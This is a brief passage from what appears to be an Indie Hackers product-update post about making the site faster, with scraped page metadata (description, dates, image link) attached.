Besides the above, there were a lot of smaller things, too. And my list of potential speed improvements is still super long. But I'm happy enough with the progress so far to move on to other things for a little bit. | true | true | true | Indie Hackers should be much faster nowadays… at least for some of you! In the past week, the PageSpeed Insights score for our homepage on mobile jumped... | 2024-10-12 00:00:00 | 2020-09-29 00:00:00 | https://storage.googleapis.com/indie-hackers.appspot.com/shareable-images/product-updates/-MINh-5tcAnVczzqARIT | article | indiehackers.com | Indie Hackers | null | null |